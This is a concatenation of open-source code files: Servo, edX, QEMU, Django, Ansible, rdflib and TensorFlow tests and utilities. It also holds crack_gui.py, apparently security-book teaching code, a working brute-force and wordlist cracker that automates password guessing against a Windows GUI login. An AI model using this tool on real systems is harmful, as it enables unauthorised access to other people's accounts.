errors = tidy.collect_errors_for_files(iterFile('spec.webidl'), [tidy.check_webidl_spec], [], print_text=False)
self.assertEqual('No specification link found.', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_toml(self):
errors = tidy.collect_errors_for_files(iterFile('Cargo.toml'), [tidy.check_toml], [], print_text=False)
self.assertEqual('found asterisk instead of minimum version number', errors.next()[2])
self.assertEqual('.toml file should contain a valid license.', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_modeline(self):
errors = tidy.collect_errors_for_files(iterFile('modeline.txt'), [], [tidy.check_modeline], print_text=False)
self.assertEqual('vi modeline present', errors.next()[2])
self.assertEqual('vi modeline present', errors.next()[2])
self.assertEqual('vi modeline present', errors.next()[2])
self.assertEqual('emacs file variables present', errors.next()[2])
self.assertEqual('emacs file variables present', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_malformed_json(self):
errors = tidy.collect_errors_for_files(iterFile('malformed_json.json'), [tidy.check_json], [], print_text=False)
self.assertEqual('Invalid control character at: line 3 column 40 (char 61)', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_json_with_duplicate_key(self):
errors = tidy.collect_errors_for_files(iterFile('duplicate_key.json'), [tidy.check_json], [], print_text=False)
self.assertEqual('Duplicated Key (the_duplicated_key)', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_json_with_unordered_keys(self):
tidy.config["check-ordered-json-keys"].append('python/tidy/servo_tidy_tests/unordered_key.json')
errors = tidy.collect_errors_for_files(iterFile('unordered_key.json'), [tidy.check_json], [], print_text=False)
self.assertEqual('Unordered key (found b before a)', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_yaml_with_duplicate_key(self):
errors = tidy.collect_errors_for_files(iterFile('duplicate_keys_buildbot_steps.yml'), [tidy.check_yaml], [], print_text=False)
self.assertEqual('Duplicated Key (duplicate_yaml_key)', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_non_list_mapped_buildbot_steps(self):
errors = tidy.collect_errors_for_files(iterFile('non_list_mapping_buildbot_steps.yml'), [tidy.check_yaml], [], print_text=False)
self.assertEqual("Key 'non-list-key' maps to type 'str', but list expected", errors.next()[2])
self.assertNoMoreErrors(errors)
def test_non_string_list_mapping_buildbot_steps(self):
errors = tidy.collect_errors_for_files(iterFile('non_string_list_buildbot_steps.yml'), [tidy.check_yaml], [], print_text=False)
self.assertEqual("List mapped to 'mapping_key' contains non-string element", errors.next()[2])
self.assertNoMoreErrors(errors)
def test_lock(self):
errors = tidy.collect_errors_for_files(iterFile('duplicated_package.lock'), [tidy.check_lock], [], print_text=False)
msg = """duplicate versions for package `test`
\t\x1b[93mThe following packages depend on version 0.4.9 from 'crates.io':\x1b[0m
\t\ttest2
\t\x1b[93mThe following packages depend on version 0.5.1 from 'crates.io':\x1b[0m"""
self.assertEqual(msg, errors.next()[2])
msg2 = """duplicate versions for package `test3`
\t\x1b[93mThe following packages depend on version 0.5.1 from 'crates.io':\x1b[0m
\t\ttest4
\t\x1b[93mThe following packages depend on version 0.5.1 from 'https://github.com/user/test3':\x1b[0m
\t\ttest5"""
self.assertEqual(msg2, errors.next()[2])
self.assertNoMoreErrors(errors)
def test_lint_runner(self):
test_path = base_path + 'lints/'
runner = tidy.LintRunner(only_changed_files=False, progress=False)
runner.path = test_path + 'some-fictional-file'
self.assertEqual([(runner.path, 0, "file does not exist")], list(runner.check()))
runner.path = test_path + 'not_script'
self.assertEqual([(runner.path, 0, "lint should be a python script")],
list(runner.check()))
runner.path = test_path + 'not_inherited.py'
self.assertEqual([(runner.path, 1, "class 'Lint' should inherit from 'LintRunner'")],
list(runner.check()))
runner.path = test_path + 'no_lint.py'
self.assertEqual([(runner.path, 1, "script should contain a class named 'Lint'")],
list(runner.check()))
runner.path = test_path + 'no_run.py'
self.assertEqual([(runner.path, 0, "class 'Lint' should implement 'run' method")],
list(runner.check()))
runner.path = test_path + 'invalid_error_tuple.py'
self.assertEqual([(runner.path, 1, "errors should be a tuple of (path, line, reason)")],
list(runner.check()))
runner.path = test_path + 'proper_file.py'
self.assertEqual([('path', 0, "foobar")], list(runner.check()))
def test_file_list(self):
        base_path = './python/tidy/servo_tidy_tests/test_ignored'
file_list = tidy.FileList(base_path, only_changed_files=False, exclude_dirs=[])
lst = list(file_list)
self.assertEqual([os.path.join(base_path, 'whee', 'test.rs'), os.path.join(base_path, 'whee', 'foo', 'bar.rs')], lst)
file_list = tidy.FileList(base_path, only_changed_files=False,
exclude_dirs=[os.path.join(base_path, 'whee', 'foo')])
lst = list(file_list)
self.assertEqual([os.path.join(base_path, 'whee', 'test.rs')], lst)
def do_tests():
suite = unittest.TestLoader().loadTestsFromTestCase(CheckTidiness)
return 0 if unittest.TextTestRunner(verbosity=2).run(suite).wasSuccessful() else 1
|
10clouds/edx-platform
|
refs/heads/dev
|
openedx/core/djangoapps/content/course_structures/tests.py
|
7
|
"""
Course Structure Content sub-application test cases
"""
import json
from nose.plugins.attrib import attr
from xmodule_django.models import UsageKey
from xmodule.modulestore.django import SignalHandler
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from openedx.core.djangoapps.content.course_structures.models import CourseStructure
from openedx.core.djangoapps.content.course_structures.signals import listen_for_course_publish
from openedx.core.djangoapps.content.course_structures.tasks import _generate_course_structure, update_course_structure
class SignalDisconnectTestMixin(object):
"""
Mixin for tests to disable calls to signals.listen_for_course_publish when the course_published signal is fired.
"""
def setUp(self):
super(SignalDisconnectTestMixin, self).setUp()
SignalHandler.course_published.disconnect(listen_for_course_publish)
@attr('shard_2')
class CourseStructureTaskTests(ModuleStoreTestCase):
"""
Test cases covering Course Structure task-related workflows
"""
def setUp(self, **kwargs):
super(CourseStructureTaskTests, self).setUp()
self.course = CourseFactory.create(org='TestX', course='TS101', run='T1')
self.section = ItemFactory.create(parent=self.course, category='chapter', display_name='Test Section')
self.discussion_module_1 = ItemFactory.create(
parent=self.course,
category='discussion',
discussion_id='test_discussion_id_1'
)
self.discussion_module_2 = ItemFactory.create(
parent=self.course,
category='discussion',
discussion_id='test_discussion_id_2'
)
CourseStructure.objects.all().delete()
def test_generate_course_structure(self):
blocks = {}
def add_block(block):
"""
Inserts new child XBlocks into the existing course tree
"""
children = block.get_children() if block.has_children else []
blocks[unicode(block.location)] = {
"usage_key": unicode(block.location),
"block_type": block.category,
"display_name": block.display_name,
"graded": block.graded,
"format": block.format,
"children": [unicode(child.location) for child in children]
}
for child in children:
add_block(child)
add_block(self.course)
expected = {
'root': unicode(self.course.location),
'blocks': blocks
}
self.maxDiff = None
actual = _generate_course_structure(self.course.id)
self.assertDictEqual(actual['structure'], expected)
def test_structure_json(self):
"""
Although stored as compressed data, CourseStructure.structure_json should always return the uncompressed string.
"""
course_id = 'a/b/c'
structure = {
'root': course_id,
'blocks': {
course_id: {
'id': course_id
}
}
}
structure_json = json.dumps(structure)
structure = CourseStructure.objects.create(course_id=self.course.id, structure_json=structure_json)
self.assertEqual(structure.structure_json, structure_json)
# Reload the data to ensure the init signal is fired to decompress the data.
cs = CourseStructure.objects.get(course_id=self.course.id)
self.assertEqual(cs.structure_json, structure_json)
def test_structure(self):
"""
CourseStructure.structure should return the uncompressed, JSON-parsed course structure.
"""
structure = {
'root': 'a/b/c',
'blocks': {
'a/b/c': {
'id': 'a/b/c'
}
}
}
structure_json = json.dumps(structure)
cs = CourseStructure.objects.create(course_id=self.course.id, structure_json=structure_json)
self.assertDictEqual(cs.structure, structure)
def test_ordered_blocks(self):
structure = {
'root': 'a/b/c',
'blocks': {
'a/b/c': {
'id': 'a/b/c',
'children': [
'g/h/i'
]
},
'd/e/f': {
'id': 'd/e/f',
'children': []
},
'g/h/i': {
'id': 'h/j/k',
'children': [
'j/k/l',
'd/e/f'
]
},
'j/k/l': {
'id': 'j/k/l',
'children': []
}
}
}
in_order_blocks = ['a/b/c', 'g/h/i', 'j/k/l', 'd/e/f']
structure_json = json.dumps(structure)
retrieved_course_structure = CourseStructure.objects.create(
course_id=self.course.id, structure_json=structure_json
)
self.assertEqual(retrieved_course_structure.ordered_blocks.keys(), in_order_blocks)
def test_block_with_missing_fields(self):
"""
The generator should continue to operate on blocks/XModule that do not have graded or format fields.
"""
# TODO In the future, test logging using testfixtures.LogCapture
# (https://pythonhosted.org/testfixtures/logging.html). Talk to TestEng before adding that library.
category = 'peergrading'
display_name = 'Testing Module'
module = ItemFactory.create(parent=self.section, category=category, display_name=display_name)
structure = _generate_course_structure(self.course.id)
usage_key = unicode(module.location)
actual = structure['structure']['blocks'][usage_key]
expected = {
"usage_key": usage_key,
"block_type": category,
"display_name": display_name,
"graded": False,
"format": None,
"children": []
}
self.assertEqual(actual, expected)
def test_generate_discussion_id_map(self):
id_map = {}
def add_block(block):
"""Adds the given block and all of its children to the expected discussion id map"""
children = block.get_children() if block.has_children else []
if block.category == 'discussion':
id_map[block.discussion_id] = unicode(block.location)
for child in children:
add_block(child)
add_block(self.course)
actual = _generate_course_structure(self.course.id)
self.assertEqual(actual['discussion_id_map'], id_map)
def test_discussion_id_map_json(self):
id_map = {
'discussion_id_1': 'module_location_1',
'discussion_id_2': 'module_location_2'
}
id_map_json = json.dumps(id_map)
structure = CourseStructure.objects.create(course_id=self.course.id, discussion_id_map_json=id_map_json)
self.assertEqual(structure.discussion_id_map_json, id_map_json)
structure = CourseStructure.objects.get(course_id=self.course.id)
self.assertEqual(structure.discussion_id_map_json, id_map_json)
def test_discussion_id_map(self):
id_map = {
'discussion_id_1': 'block-v1:TestX+TS101+T1+type@discussion+block@b141953dff414921a715da37eb14ecdc',
'discussion_id_2': 'i4x://TestX/TS101/discussion/466f474fa4d045a8b7bde1b911e095ca'
}
id_map_json = json.dumps(id_map)
structure = CourseStructure.objects.create(course_id=self.course.id, discussion_id_map_json=id_map_json)
expected_id_map = {
key: UsageKey.from_string(value).map_into_course(self.course.id)
for key, value in id_map.iteritems()
}
self.assertEqual(structure.discussion_id_map, expected_id_map)
def test_discussion_id_map_missing(self):
structure = CourseStructure.objects.create(course_id=self.course.id)
self.assertIsNone(structure.discussion_id_map)
def test_update_course_structure(self):
"""
Test the actual task that orchestrates data generation and updating the database.
"""
# Method requires string input
course_id = self.course.id
self.assertRaises(ValueError, update_course_structure, course_id)
# Ensure a CourseStructure object is created
expected_structure = _generate_course_structure(course_id)
update_course_structure(unicode(course_id))
structure = CourseStructure.objects.get(course_id=course_id)
self.assertEqual(structure.course_id, course_id)
self.assertEqual(structure.structure, expected_structure['structure'])
self.assertEqual(structure.discussion_id_map.keys(), expected_structure['discussion_id_map'].keys())
self.assertEqual(
[unicode(value) for value in structure.discussion_id_map.values()],
expected_structure['discussion_id_map'].values()
)
|
ehabkost/tp-qemu
|
refs/heads/master
|
qemu/tests/timedrift_with_migration.py
|
7
|
import logging
from autotest.client.shared import error
from virttest import utils_test
def run(test, params, env):
"""
Time drift test with migration:
1) Log into a guest.
2) Take a time reading from the guest and host.
3) Migrate the guest.
4) Take a second time reading.
5) If the drift (in seconds) is higher than a user specified value, fail.
:param test: QEMU test object.
:param params: Dictionary with test parameters.
:param env: Dictionary with the test environment.
"""
vm = env.get_vm(params["main_vm"])
vm.verify_alive()
boot_option_added = params.get("boot_option_added")
boot_option_removed = params.get("boot_option_removed")
if boot_option_added or boot_option_removed:
utils_test.update_boot_option(vm,
args_removed=boot_option_removed,
args_added=boot_option_added)
timeout = int(params.get("login_timeout", 360))
session = vm.wait_for_login(timeout=timeout)
# Collect test parameters:
# Command to run to get the current time
time_command = params["time_command"]
# Filter which should match a string to be passed to time.strptime()
time_filter_re = params["time_filter_re"]
# Time format for time.strptime()
time_format = params["time_format"]
drift_threshold = float(params.get("drift_threshold", "10"))
drift_threshold_single = float(params.get("drift_threshold_single", "3"))
migration_iterations = int(params.get("migration_iterations", 1))
try:
# Get initial time
# (ht stands for host time, gt stands for guest time)
(ht0, gt0) = utils_test.get_time(session, time_command,
time_filter_re, time_format)
# Migrate
for i in range(migration_iterations):
# Get time before current iteration
(ht0_, gt0_) = utils_test.get_time(session, time_command,
time_filter_re, time_format)
session.close()
# Run current iteration
logging.info("Migrating: iteration %d of %d...",
(i + 1), migration_iterations)
vm.migrate()
# Log in
logging.info("Logging in after migration...")
session = vm.wait_for_login(timeout=30)
logging.info("Logged in after migration")
# Get time after current iteration
(ht1_, gt1_) = utils_test.get_time(session, time_command,
time_filter_re, time_format)
# Report iteration results
host_delta = ht1_ - ht0_
guest_delta = gt1_ - gt0_
drift = abs(host_delta - guest_delta)
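            # i.e. how far the guest clock diverged from the host clock
            # over the same interval (absolute difference of the two deltas)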
logging.info("Host duration (iteration %d): %.2f",
(i + 1), host_delta)
logging.info("Guest duration (iteration %d): %.2f",
(i + 1), guest_delta)
logging.info("Drift at iteration %d: %.2f seconds",
(i + 1), drift)
# Fail if necessary
if drift > drift_threshold_single:
raise error.TestFail("Time drift too large at iteration %d: "
"%.2f seconds" % (i + 1, drift))
# Get final time
(ht1, gt1) = utils_test.get_time(session, time_command,
time_filter_re, time_format)
finally:
if session:
session.close()
        # Remove boot flags added for this test.
if boot_option_added or boot_option_removed:
utils_test.update_boot_option(vm,
args_removed=boot_option_added,
args_added=boot_option_removed)
# Report results
host_delta = ht1 - ht0
guest_delta = gt1 - gt0
drift = abs(host_delta - guest_delta)
logging.info("Host duration (%d migrations): %.2f",
migration_iterations, host_delta)
logging.info("Guest duration (%d migrations): %.2f",
migration_iterations, guest_delta)
logging.info("Drift after %d migrations: %.2f seconds",
migration_iterations, drift)
# Fail if necessary
if drift > drift_threshold:
raise error.TestFail("Time drift too large after %d migrations: "
"%.2f seconds" % (migration_iterations, drift))
|
pombredanne/pyahocorasick
|
refs/heads/master
|
dump2dot.py
|
2
|
"""
Aho-Corasick string search algorithm.
Author : Wojciech Muła, wojciech_mula@poczta.onet.pl
WWW : http://0x80.pl
License : public domain
"""
import ahocorasick
import os
from ahocorasick import EMPTY, TRIE, AHOCORASICK;
def dump2dot(automaton, file):
def writeln(text=""):
file.write(text + "\n")
def nodename(nodeid):
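        # Node ids are likely C pointer values and may arrive as negative
        # Python ints; masking to 32 bits keeps the names printable with %x.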
return 'node%x' % (nodeid & 0xffffffff)
if automaton.kind == EMPTY:
writeln("digraph empty {}")
return
if automaton.kind == TRIE:
name = "trie"
else:
name = "ahocorasick"
writeln("digraph %s {" % name)
nodes, edges, fail = automaton.dump()
# nodes
for nodeid, end in nodes:
if end:
attr = '[shape=doublecircle, label=""]'
else:
attr = '[shape=circle, label=""]'
writeln("\t%s %s" % (nodename(nodeid), attr))
def format_label(label):
label = str(label, 'ascii')
label = label.replace('"', r'\"')
return '"%s"' % label
# trie edges
for nodeid, label, destid in edges:
writeln("\t%s -> %s [label=%s]" % (nodename(nodeid), nodename(destid), format_label(label)))
# fail links
for nodeid, failid in fail:
writeln("\t%s -> %s [color=blue]" % (nodename(nodeid), nodename(failid)))
writeln("}")
def show(automaton):
path = '/dev/shm/%s.dot' % os.getpid()
with open(path, 'wt') as f:
dump2dot(automaton, f)
os.system("xdot %s" % path)
#os.system("dotty %s" % path)
os.unlink(path)
if __name__ == '__main__':
A = ahocorasick.Automaton(ahocorasick.STORE_LENGTH)
A.add_word("he")
A.add_word("her")
A.add_word("hers")
A.add_word("she")
A.add_word("cat")
A.add_word("shield")
with open('trie.dot', 'wt') as f:
dump2dot(A, f)
A.make_automaton()
with open('ahocorasick.dot', 'wt') as f:
dump2dot(A, f)
|
Mixser/django
|
refs/heads/master
|
tests/utils_tests/test_tree.py
|
429
|
import copy
import unittest
from django.utils.tree import Node
class NodeTests(unittest.TestCase):
def setUp(self):
self.node1_children = [('a', 1), ('b', 2)]
self.node1 = Node(self.node1_children)
self.node2 = Node()
def test_str(self):
self.assertEqual(str(self.node1), "(DEFAULT: ('a', 1), ('b', 2))")
self.assertEqual(str(self.node2), "(DEFAULT: )")
def test_repr(self):
self.assertEqual(repr(self.node1),
"<Node: (DEFAULT: ('a', 1), ('b', 2))>")
self.assertEqual(repr(self.node2), "<Node: (DEFAULT: )>")
def test_len(self):
self.assertEqual(len(self.node1), 2)
self.assertEqual(len(self.node2), 0)
def test_bool(self):
self.assertTrue(self.node1)
self.assertFalse(self.node2)
def test_contains(self):
self.assertIn(('a', 1), self.node1)
self.assertNotIn(('a', 1), self.node2)
def test_add(self):
# start with the same children of node1 then add an item
node3 = Node(self.node1_children)
node3_added_child = ('c', 3)
# add() returns the added data
self.assertEqual(node3.add(node3_added_child, Node.default),
node3_added_child)
# we added exactly one item, len() should reflect that
self.assertEqual(len(self.node1) + 1, len(node3))
self.assertEqual(str(node3), "(DEFAULT: ('a', 1), ('b', 2), ('c', 3))")
def test_negate(self):
# negated is False by default
self.assertFalse(self.node1.negated)
self.node1.negate()
self.assertTrue(self.node1.negated)
self.node1.negate()
self.assertFalse(self.node1.negated)
def test_deepcopy(self):
node4 = copy.copy(self.node1)
node5 = copy.deepcopy(self.node1)
self.assertIs(self.node1.children, node4.children)
self.assertIsNot(self.node1.children, node5.children)
|
garbled1/ansible
|
refs/heads/devel
|
test/units/playbook/test_block.py
|
119
|
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.compat.tests import unittest
from ansible.playbook.block import Block
from ansible.playbook.task import Task
class TestBlock(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_construct_empty_block(self):
b = Block()
def test_construct_block_with_role(self):
pass
def test_load_block_simple(self):
ds = dict(
block=[],
rescue=[],
always=[],
# otherwise=[],
)
b = Block.load(ds)
self.assertEqual(b.block, [])
self.assertEqual(b.rescue, [])
self.assertEqual(b.always, [])
# not currently used
# self.assertEqual(b.otherwise, [])
def test_load_block_with_tasks(self):
ds = dict(
block=[dict(action='block')],
rescue=[dict(action='rescue')],
always=[dict(action='always')],
# otherwise=[dict(action='otherwise')],
)
b = Block.load(ds)
self.assertEqual(len(b.block), 1)
self.assertIsInstance(b.block[0], Task)
self.assertEqual(len(b.rescue), 1)
self.assertIsInstance(b.rescue[0], Task)
self.assertEqual(len(b.always), 1)
self.assertIsInstance(b.always[0], Task)
# not currently used
# self.assertEqual(len(b.otherwise), 1)
# self.assertIsInstance(b.otherwise[0], Task)
def test_load_implicit_block(self):
ds = [dict(action='foo')]
b = Block.load(ds)
self.assertEqual(len(b.block), 1)
self.assertIsInstance(b.block[0], Task)
def test_deserialize(self):
ds = dict(
block=[dict(action='block')],
rescue=[dict(action='rescue')],
always=[dict(action='always')],
)
b = Block.load(ds)
data = dict(parent=ds, parent_type='Block')
b.deserialize(data)
self.assertIsInstance(b._parent, Block)
|
marma/rdflib
|
refs/heads/master
|
test/test_namespace.py
|
8
|
import unittest
from rdflib.graph import Graph
from rdflib.term import URIRef
from rdflib.py3compat import b
class NamespacePrefixTest(unittest.TestCase):
def test_compute_qname(self):
"""Test sequential assignment of unknown prefixes"""
g = Graph()
self.assertEqual(g.compute_qname(URIRef("http://foo/bar/baz")),
("ns1", URIRef("http://foo/bar/"), "baz"))
self.assertEqual(g.compute_qname(URIRef("http://foo/bar#baz")),
("ns2", URIRef("http://foo/bar#"), "baz"))
# should skip to ns4 when ns3 is already assigned
g.bind("ns3", URIRef("http://example.org/"))
self.assertEqual(g.compute_qname(URIRef("http://blip/blop")),
("ns4", URIRef("http://blip/"), "blop"))
def test_n3(self):
g = Graph()
g.add((URIRef("http://example.com/foo"),
URIRef("http://example.com/bar"),
URIRef("http://example.com/baz")))
n3 = g.serialize(format="n3")
# Gunnar disagrees that this is right:
# self.assertTrue("<http://example.com/foo> ns1:bar <http://example.com/baz> ." in n3)
# as this is much prettier, and ns1 is already defined:
self.assertTrue(b("ns1:foo ns1:bar ns1:baz .") in n3)
def test_n32(self):
# this test not generating prefixes for subjects/objects
g = Graph()
g.add((URIRef("http://example1.com/foo"),
URIRef("http://example2.com/bar"),
URIRef("http://example3.com/baz")))
n3 = g.serialize(format="n3")
self.assertTrue(b("<http://example1.com/foo> ns1:bar <http://example3.com/baz> .") in n3)
|
rabipanda/tensorflow
|
refs/heads/master
|
tensorflow/contrib/distributions/python/kernel_tests/conditional_distribution_test.py
|
135
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Bernoulli distribution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import distributions
from tensorflow.contrib.distributions.python.kernel_tests import distribution_test
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_shape
from tensorflow.python.platform import test
class ConditionalDistributionTest(distribution_test.DistributionTest):
def _GetFakeDistribution(self):
class _FakeDistribution(distributions.ConditionalDistribution):
"""Fake Distribution for testing _set_sample_static_shape."""
def __init__(self, batch_shape=None, event_shape=None):
self._static_batch_shape = tensor_shape.TensorShape(batch_shape)
self._static_event_shape = tensor_shape.TensorShape(event_shape)
super(_FakeDistribution, self).__init__(
dtype=dtypes.float32,
reparameterization_type=distributions.NOT_REPARAMETERIZED,
validate_args=True,
allow_nan_stats=True,
name="DummyDistribution")
def _batch_shape(self):
return self._static_batch_shape
def _event_shape(self):
return self._static_event_shape
def _sample_n(self, unused_shape, unused_seed, arg1, arg2):
raise ValueError(arg1, arg2)
def _log_prob(self, _, arg1, arg2):
raise ValueError(arg1, arg2)
def _prob(self, _, arg1, arg2):
raise ValueError(arg1, arg2)
def _cdf(self, _, arg1, arg2):
raise ValueError(arg1, arg2)
def _log_cdf(self, _, arg1, arg2):
raise ValueError(arg1, arg2)
def _log_survival_function(self, _, arg1, arg2):
raise ValueError(arg1, arg2)
def _survival_function(self, _, arg1, arg2):
raise ValueError(arg1, arg2)
return _FakeDistribution
def testNotImplemented(self):
d = self._GetFakeDistribution()(batch_shape=[], event_shape=[])
for name in ["sample", "log_prob", "prob", "log_cdf", "cdf",
"log_survival_function", "survival_function"]:
method = getattr(d, name)
with self.assertRaisesRegexp(ValueError, "b1.*b2"):
method([] if name == "sample" else 1.0, arg1="b1", arg2="b2")
if __name__ == "__main__":
test.main()
|
HackingWithPython/Chapter_Source_Code
|
refs/heads/master
|
Chapter_4/crack_gui.py
|
1
|
import win32gui, win32com.client
import time, sys, re, argparse
from itertools import chain, product
from datetime import datetime
class SendKeys:
def __init__ (self):
self.obj = win32com.client.Dispatch("WScript.Shell")
def send (self, data):
self.obj.SendKeys(data, 0)
def run (self, path):
self.obj.Run(path)
self.obj.AppActivate("IFT 5.7 Login")
class WinMan:
def __init__ (self):
self.handle = None
def fndWin(self, classname, windowname):
self.handle = win32gui.FindWindow(classname, windowname)
def winEnumCallBack(self, hwnd, regex):
if re.match(regex, str(win32gui.GetWindowText(hwnd))) != None:
self.handle = hwnd
def searchWin(self, regex):
self.handle = None
win32gui.EnumWindows(self.winEnumCallBack, regex)
class glob: # Shared helpers and expected response window titles
wm = WinMan()
sk = SendKeys()
invalid = "Invalid Login" # Window Title
valid = ".*IFT.*" # Window Title using regex
found = False
# Iterable Method for brute-forcing a character set and length
def bruteforce(charset, maxlength, minlength):
return (''.join(candidate)
for candidate in chain.from_iterable(product(charset, repeat=i)
for i in range(minlength, maxlength + 1)))
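# Illustrative: bruteforce("ab", 2, 1) yields 'a', 'b', 'aa', 'ab', 'ba', 'bb',
# i.e. every candidate from the charset in order of increasing length.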
def crack(args, pwd): # Method for trying passwords
try:
if args.verbose:
print ("[-] Trying: " + pwd.strip())
glob.sk.send(args.username + "{TAB}" + pwd + "{TAB}{ENTER}")
time.sleep(.05)
# Look for failed response text in title
glob.wm.fndWin(None, glob.invalid)
if glob.wm.handle > 0: # If hwnd > 0, we found it
glob.sk.send("{ENTER}{TAB}^a{BS}{TAB}^a{BS}{TAB}{TAB}")
else: # Look for window containing valid response
glob.wm.searchWin(glob.valid)
if glob.wm.handle > 0:
print ("[+] Password: " + pwd)
glob.found = True
else:
print ("[!] Unable to locate known windows. Manually verify successful login.")
print ("[?] Potential Password: " + pwd)
except Exception as err:
print (str(err))
def main(args):
cnt = 0
start = datetime.now()
print ("==================================================")
print ("Started @ " + str(start))
print ("==================================================")
glob.sk.run(args.path)
time.sleep(.5)
if args.wordlist is None:
# No wordlist, perform bruteforce
if not args.charset: # A character set is required when brute-forcing
sys.exit("[!] Provide a wordlist (-w) or a character set (-c)")
for pwd in bruteforce(args.charset, args.maxlen, args.minlen): # Launch brute-force
if glob.found: break # Stop if password found
if args.prefix: # Prefix string to password
pwd = str(args.prefix) + pwd
if args.postfix: # Postfix string to password
pwd += str(args.postfix)
crack(args, pwd) # Launch Crack
cnt += 1
else:
# Open password list
with open(args.wordlist) as fle:
for pwd in fle: # Loop through passwords
if glob.found: break
pwd = pwd.strip()
crack(args, pwd) # Launch Crack
cnt += 1
stop = datetime.now()
persec = str(cnt/((stop - start).total_seconds()))
print ("==================================================")
print ("Attack Duration: " + str(stop - start))
print ("Crack Attempts: " + str(cnt) + " @ " + str(persec) + " per second")
print ("==================================================")
if __name__ == "__main__":
# Declare an argparse variable to handle application command line arguments
parser = argparse.ArgumentParser()
parser.add_argument("path", action="store", help="full path to executable")
parser.add_argument("username", action="store", help="username to crack")
parser.add_argument("-w", "--wordlist", action="store", help="wordlist of passwords")
parser.add_argument("-c", "--charset", action="store", help="character set")
parser.add_argument("-x", "--maxlen", action="store", help="maximum password length",
nargs='?', default=8, const=8, type=int)
parser.add_argument("-m","--minlen", action="store",
nargs='?', default=1, const=1, help="minimum password length", type=int)
parser.add_argument("-r","--prefix", action="store", help="prefix each password")
parser.add_argument("-o","--postfix", action="store", help="postfix each password")
parser.add_argument("-v", "--verbose", action="store", help="verbose output",
nargs='?', default=False, const=True)
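# Illustrative invocations (hypothetical target path, username and charset):
# python crack_gui.py "C:\IFT\ift.exe" admin -c abcdef123 -m 1 -x 4 -v
# python crack_gui.py "C:\IFT\ift.exe" admin -w passwords.txt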
if len(sys.argv[2:])==0: # Show help if required arg not included
parser.print_help()
parser.exit()
args = parser.parse_args() # Parse command-line arguments into args
if args.minlen > args.maxlen: # Ensure minimum does not exceed maximum
parser.print_help()
print ("\n** Argument Logic Error **")
print ("Minimum password length [-m "+str(args.minlen)+"] is greater than Password length [-x "+str(args.maxlen)+"]\n")
parser.exit()
main(args)
|
j00bar/ansible
|
refs/heads/devel
|
lib/ansible/modules/cloud/amazon/ec2_eip.py
|
78
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'curated'}
DOCUMENTATION = '''
---
module: ec2_eip
short_description: manages EC2 elastic IP (EIP) addresses.
description:
- This module can allocate or release an EIP.
- This module can associate/disassociate an EIP with instances or network interfaces.
version_added: "1.4"
options:
device_id:
description:
- The id of the device for the EIP. Can be an EC2 Instance id or Elastic Network Interface (ENI) id.
required: false
aliases: [ instance_id ]
version_added: "2.0"
public_ip:
description:
- The IP address of a previously allocated EIP.
- If present and device is specified, the EIP is associated with the device.
- If absent and device is specified, the EIP is disassociated from the device.
required: false
aliases: [ ip ]
state:
description:
- If present, allocate an EIP or associate an existing EIP with a device.
- If absent, disassociate the EIP from the device and optionally release it.
required: false
choices: ['present', 'absent']
default: present
in_vpc:
description:
- allocate an EIP inside a VPC or not
required: false
default: false
version_added: "1.4"
reuse_existing_ip_allowed:
description:
- Reuse an EIP that is not associated to a device (when available), instead of allocating a new one.
required: false
default: false
version_added: "1.6"
release_on_disassociation:
description:
- whether or not to automatically release the EIP when it is disassociated
required: false
default: false
version_added: "2.0"
private_ip_address:
description:
- The primary or secondary private IP address to associate with the Elastic IP address.
required: False
default: None
version_added: "2.3"
extends_documentation_fragment:
- aws
- ec2
author: "Rick Mendes (@rickmendes) <rmendes@illumina.com>"
notes:
- This module will return C(public_ip) on success, which will contain the
public IP address associated with the device.
- There may be a delay between the time the EIP is assigned and when
the cloud instance is reachable via the new address. Use wait_for and
pause to delay further playbook execution until the instance is reachable,
if necessary.
- This module returns multiple changed statuses on disassociation or release.
It returns an overall status based on any changes occurring. It also returns
individual changed statuses for disassociation and release.
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
- name: associate an elastic IP with an instance
ec2_eip:
device_id: i-1212f003
ip: 93.184.216.119
- name: associate an elastic IP with a device
ec2_eip:
device_id: eni-c8ad70f3
ip: 93.184.216.119
- name: disassociate an elastic IP from an instance
ec2_eip:
device_id: i-1212f003
